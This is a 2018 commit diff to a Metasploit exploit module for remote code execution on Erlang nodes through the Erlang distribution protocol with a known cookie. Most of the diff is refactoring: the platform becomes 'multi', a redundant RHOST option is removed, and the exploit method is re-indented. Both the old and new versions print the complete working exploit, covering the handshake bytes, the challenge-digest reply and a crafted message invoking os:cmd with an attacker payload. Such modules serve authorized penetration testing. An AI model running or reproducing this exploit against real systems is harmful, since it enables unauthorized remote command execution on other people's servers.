changes

2018-12-09 00:10:54 -06:00 · 2018-12-09 00:10:54 -06:00 · 02f3d4688f
parent 69ed80f685
commit 02f3d4688f
1 changed files with 43 additions and 46 deletions
--- a/modules/exploits/multi/erlang_cookie_rce.rb
+++ b/modules/exploits/multi/erlang_cookie_rce.rb
@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
            ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
          ],
        'License'        => MSF_LICENSE,
-        'Platform'       => 'unix',
+        'Platform'       => 'multi',
        'Privileged'     => 'false',
        'DefaultOptions' =>
          {
@ -46,7 +46,6 @@ class MetasploitModule < Msf::Exploit::Remote
    register_options(
      [
        OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
-        Opt::RHOST(),
        Opt::RPORT(25672)
      ])
  end
@ -63,56 +62,54 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    begin
-      connect
+    connect

-      our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}"
+    our_node = "#{rand_text_alphanumeric(6)}@#{rand_text_alphanumeric(7)}"

-      # SEND_NAME: send initial identification of who "we" are
-      send_name =  "\x00\x15"
-      send_name << "\x6e"
-      send_name << "\x00\x05"
-      send_name << "\x00\x03\x49\x9c"
-      send_name << "#{our_node}"
-      # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
-      send_challenge_reply =  "\x00\x15"
-      send_challenge_reply << "\x72"
-      # SEND: send the message to the node
-      send =  "\x00\x00\x00"
-      send << [(0x6c+payload.raw.length).to_s(16)].pack('H*')
-      send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e"
-      send << "#{our_node}"
-      send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64"
-      send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e"
-      send << "#{our_node}"
-      send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04"
-      send << "call"
-      send << "\x64\x00\x02"
-      send << "os"
-      send << "\x64\x00\x03"
-      send << "cmd"
-      send << "\x6c\x00\x00\x00\x01\x6b\x00"
-      send << [(payload.raw.length).to_s(16)].pack('H*')
-      send << payload.raw
-      send << "\x6a\x64\x00\x04\x75\x73"
-      send << "\x65\x72"
+    # SEND_NAME: send initial identification of who "we" are
+    send_name =  "\x00\x15"
+    send_name << "\x6e"
+    send_name << "\x00\x05"
+    send_name << "\x00\x03\x49\x9c"
+    send_name << "#{our_node}"
+    # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
+    send_challenge_reply =  "\x00\x15"
+    send_challenge_reply << "\x72"
+    # SEND: send the message to the node
+    send =  "\x00\x00\x00"
+    send << [(0x6c+payload.raw.length).to_s(16)].pack('H*')
+    send << "\x70\x83\x68\x04\x61\x06\x67\x64\x00\x0e"
+    send << "#{our_node}"
+    send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x64\x00\x00\x64"
+    send << "\x00\x03\x72\x65\x78\x83\x68\x02\x67\x64\x00\x0e"
+    send << "#{our_node}"
+    send << "\x00\x00\x00\x03\x00\x00\x00\x00\x00\x68\x05\x64\x00\x04"
+    send << "call"
+    send << "\x64\x00\x02"
+    send << "os"
+    send << "\x64\x00\x03"
+    send << "cmd"
+    send << "\x6c\x00\x00\x00\x01\x6b\x00"
+    send << [(payload.raw.length).to_s(16)].pack('H*')
+    send << payload.raw
+    send << "\x6a\x64\x00\x04\x75\x73"
+    send << "\x65\x72"

-      sock.put(send_name)
+    sock.put(send_name)

-      # recieve servers "SEND_CHALLENGE" token (4 bytes)
-      print_status("Receiving server challenge")
-      challenge =  sock.get
-      challenge = challenge[14,4]
+    # recieve servers "SEND_CHALLENGE" token (4 bytes)
+    print_status("Receiving server challenge")
+    challenge = sock.get
+    challenge = challenge[14,4]

-      send_challenge_reply << challenge
-      send_challenge_reply << generate_challenge_digest(challenge)
+    send_challenge_reply << challenge
+    send_challenge_reply << generate_challenge_digest(challenge)

-      print_status("Sending challenge reply")
-      sock.put(send_challenge_reply)
-      sock.get
+    print_status("Sending challenge reply")
+    sock.put(send_challenge_reply)
+    sock.get

-      print_status("Challenge sent, sending payload")
-      sock.put(send)
-    end
+    print_status("Challenge sent, sending payload")
+    sock.put(send)
  end
 end